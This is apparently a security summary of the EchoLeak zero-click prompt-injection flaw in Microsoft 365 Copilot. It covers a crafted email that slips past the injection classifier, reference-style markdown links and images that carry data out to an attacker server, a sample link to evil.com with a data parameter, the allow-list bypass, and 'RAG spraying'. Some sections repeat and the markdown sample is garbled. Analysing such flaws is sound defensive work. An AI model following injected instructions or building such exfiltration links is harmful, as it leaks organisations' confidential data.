Here’s a concise summary and analysis of the 0-Click “EchoLeak” vulnerability in Microsoft 365 Copilot, based on the GBHackers report and full technical article:
Summary Quote from Aim Security:
"This vulnerability represents a significant breakthrough in AI security research... attackers can automatically exfiltrate the most sensitive information from Microsoft 365 Copilot's context without requiring any user interaction whatsoever."
If your organization uses Microsoft 365 Copilot:
Further reading:
For a full technical breakdown with illustrations and attack flow, please see the detailed article: GBHackers News
Source: GBHackers News 0-Click Vulnerability in Microsoft 365 Copilot Exposes Sensitive Data via Teams
Key Facts:
- Vulnerability Name: EchoLeak
- CVE ID: CVE-2025-32711
- CVSS Score: 9.3 (Critical)
- Affected Product: Microsoft 365 Copilot (all features leveraging organizational data via RAG)
- Discovery: January 2025, by Aim Security
- Fix Released: May 2025 (no user action required, server-side)
- User Interaction Required: None (Zero-Click)
How the Attack Works (“EchoLeak” Chain):
- Entry Vector:
Attacker sends a carefully crafted email designed to look like instructions for human users. - Classifier Bypass:
Bypasses Microsoft’s prompt injection classifiers (XPIA) by crafting the email so it appears relevant to humans, not Copilot. - Markdown Formatting Bypass:
Uses reference-style markdown links (e.g.,[text][ref]
and[ref]: [url="http://evil.com?param=data"]Evil.Com - We get it...Daily.[/url]
) to bypass link redaction. - Image Exfiltration:
Leverages reference-style markdown image embedding (e.g.,![alt][ref]
), which fetches an image from an attacker’s server containing sensitive data as a URL parameter. - Domain Allow-List Bypass:
Exploits trusted domains (like Teams or SharePoint) in Microsoft’s CSP whitelist to evade existing content security policies.
Core Vulnerability:
- LLM Scope Violation: The Copilot’s AI model, when exposed to cleverly formatted external input, can be manipulated to fetch and expose privileged, internal, and highly sensitive organizational data—even the “most sensitive secret/personal information” in a document or conversation context.
- Mechanism: The AI agent acts as an “underprivileged program” that, via prompt manipulation, performs actions similar to a privileged “suid binary” in classic exploitation, exposing data otherwise inaccessible under normal conditions.
"RAG Spraying" Exploit:
- Attackers spray emails with many trick sections, boosting the odds that Copilot’s RAG (Retrieval-Augmented Generation) system fetches and leaks relevant, sensitive info.
Impact:
- All organizations using default Microsoft 365 Copilot settings were vulnerable until May 2025.
- No active exploitation was reported (per Microsoft).
- Fix deployed server-side; no user action necessary.
Broader Implications:
- AI Security: This is the first reported “zero-click” LLM exploit chain, with fundamental consequences for any platform combining Retrieval-Augmented Generation and agent-like LLM behaviors.
- Design Flaw: Issue is not just with Microsoft’s instance—potentially affects any enterprise AI assistant with similar architecture.
Official Sources:
Summary Quote from Aim Security:
"This vulnerability represents a significant breakthrough in AI security research... attackers can automatically exfiltrate the most sensitive information from Microsoft 365 Copilot's context without requiring any user interaction whatsoever."
If your organization uses Microsoft 365 Copilot:
- No further action is needed if your system has received Microsoft’s May 2025 server-side update.
- Review internal policies on LLM and RAG system deployment to mitigate “scope violation” risks for other AI assistants.
Further reading:
For a full technical breakdown with illustrations and attack flow, please see the detailed article: GBHackers News
Source: GBHackers News 0-Click Vulnerability in Microsoft 365 Copilot Exposes Sensitive Data via Teams